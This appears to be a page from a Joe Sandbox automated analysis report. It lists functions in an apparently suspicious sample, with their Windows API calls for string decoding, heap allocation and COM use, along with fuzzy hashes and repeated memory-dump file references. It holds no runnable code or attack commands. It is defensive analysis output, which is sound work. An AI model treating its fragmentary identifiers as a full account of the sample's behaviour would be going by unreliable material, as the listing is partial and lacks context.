Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 2609814428-0
Opcode ID: 8c36253e5851b728c4f7f1e32daed8143c1abe4ebd8ba7757d202fbd2c83449e
Instruction ID: 4bff4b47449953ef3f9852d9154b1e89e0086b877712ca942da10f5f4c712060
Opcode Fuzzy Hash: 8c36253e5851b728c4f7f1e32daed8143c1abe4ebd8ba7757d202fbd2c83449e
Instruction Fuzzy Hash: 56011275A40309BBEB10DFE8CD4AF9D77B8EB44708F104155FB05EB2C0DA70AA018B65

Function 00B98EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,00B85184,40000001,00000000,00000000,?,00B85184), ref: 00B98EC0

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: 21c7db05deefa6d019d48e69af84603a5b4f1808974b92d0caf22357fc48d1df
Instruction ID: 7016c59cfc04368a90fb964d50fc153374ad1b6fed5f3e296179cb8dc33e24d2
Opcode Fuzzy Hash: 21c7db05deefa6d019d48e69af84603a5b4f1808974b92d0caf22357fc48d1df
Instruction Fuzzy Hash: BA11DA74200609AFDF00CF64D885FA637E9EF8A714F10A9A8F915CB250DB75E941DB60

Function 00B89AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B84EEE,00000000,00000000), ref: 00B89AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00B84EEE,00000000,?), ref: 00B89B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B84EEE,00000000,00000000), ref: 00B89B2A
LocalFree.KERNEL32(?,?,?,?,00B84EEE,00000000,?), ref: 00B89B3F

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 994c7a8ac602c6791bccfd99848607df40a105b7404dcf34548ff04931c34b7d
Instruction ID: b0b49a4787cdb06203e76739cf70af6c6b5df3a3e7a4a1dafffc029572ad820e
Opcode Fuzzy Hash: 994c7a8ac602c6791bccfd99848607df40a105b7404dcf34548ff04931c34b7d
Instruction Fuzzy Hash: 7711A2B4241309AFEB10CF64DC95FAA77B5FB89704F208198F9159B390C7B6A901CBA4

Function 00B97980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00BA0E00,00000000,?), ref: 00B979B0
RtlAllocateHeap.NTDLL(00000000), ref: 00B979B7
GetLocalTime.KERNEL32(?,?,?,?,?,00BA0E00,00000000,?), ref: 00B979C4
wsprintfA.USER32 ref: 00B979F3

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 0274a503845756e2d1122258970ade3e3fbaef2a1237d2c84206cb1432d791ed
Instruction ID: f1b4270e0b197d9f489597339963a307e805531ee49b8611d396104465cb76c2
Opcode Fuzzy Hash: 0274a503845756e2d1122258970ade3e3fbaef2a1237d2c84206cb1432d791ed
Instruction Fuzzy Hash: D6115AB294421AABCB14CFC9DD45FBEB7F8FB4CB15F00415AF601A2280D2385900C7B1

Function 00F467FF Relevance: 5.4, Strings: 3, Instructions: 1620COMMON

Download Yara Rule

Strings

YIWn, xrefs: 00F47369
&(M, xrefs: 00F46AB1
:CP, xrefs: 00F46C6A

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: &(M$:CP$YIWn
API String ID: 0-2989883231
Opcode ID: 7e4ae2540d4e5f79ca1c94e2b85758668c5707e79e9f95f501d1a89557b3b67c
Instruction ID: 3fb4a3c249d56c0244749ed54e5729f869b0aabb1444fb6918e8b7880e4e5159
Opcode Fuzzy Hash: 7e4ae2540d4e5f79ca1c94e2b85758668c5707e79e9f95f501d1a89557b3b67c
Instruction Fuzzy Hash: 62B207F360C2009FE3046E2DEC85B7AFBE9EB94320F1A463DEAC5D7744E67558018696

Function 00B93720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(00B9E118,00000000,00000001,00B9E108,00000000), ref: 00B93758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00B937B0

Memory Dump Source

Source File: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: 22e2169e06b8b7c77292135387527589623996d2e3d19005cdf2325f4445dff2
Instruction ID: ac6be4f7619a601ac7a18fbd0943b65256565f5643df15a1542514603cfb4784
Opcode Fuzzy Hash: 22e2169e06b8b7c77292135387527589623996d2e3d19005cdf2325f4445dff2
Instruction Fuzzy Hash: 6641E970A40A28AFDB24DB58CC95F9BB7B5BB48702F5041D8E618E72D0E771AE85CF50

Function 00F4B771 Relevance: 4.0, Strings: 2, Instructions: 1520COMMON

Download Yara Rule

Strings

2bEh, xrefs: 00F4BF44
Gujw, xrefs: 00F4C68C

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2bEh$Gujw
API String ID: 0-3076499612
Opcode ID: 1fc5c04b190c0c9c17ba061b84f16bfad3efbb657cfff98a705a406617254f77
Instruction ID: b4c9295bae46f42f0fcd463fbff1b2551390290cde067aebe10d77df22f1c01b
Opcode Fuzzy Hash: 1fc5c04b190c0c9c17ba061b84f16bfad3efbb657cfff98a705a406617254f77
Instruction Fuzzy Hash: FEB2D2F36082009FE7046F29EC8567AFBE5EF94720F1A493DEAC487744E63598458787

Function 00EFB8DB Relevance: 1.5, Strings: 1, Instructions: 242COMMON

Download Yara Rule

Strings

~ sQ, xrefs: 00EFBA01

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934076154.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934572151.0000000001211000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1934591836.0000000001212000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b80000_file.jbxd

Yara matches

Similarity

API ID:
String ID: ~ sQ
API String ID: 0-2325153028
Opcode ID: bb6e8d645011821c4baa46c5009b2f67db8f64c976c64a004c1347ab02a353f4
Instruction ID: a1c833e4c96b5bdae78997a87668d5aa54da90e4c887c409e4dbdac34f13940b
Opcode Fuzzy Hash: bb6e8d645011821c4baa46c5009b2f67db8f64c976c64a004c1347ab02a353f4
Instruction Fuzzy Hash: A8715BF3A082249BE3087A2CDC957BAF7E9DF54360F1A453DEBC593780E935580486C6

Function 00DFC26F Relevance: 1.5, Strings: 1, Instructions: 231COMMON

Download Yara Rule

Strings

ttwo, xrefs: 00DFC4EA

Memory Dump Source

Source File: 00000000.00000002.1933805046.0000000000DDE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true

Associated: 00000000.00000002.1933173448.0000000000B80000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000BDA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000C9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933194621.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000000F5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000103A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.000000000105F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001067000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1933805046.0000000001075000.00000040.00000001.01000000.00000003.sdmpDownload File
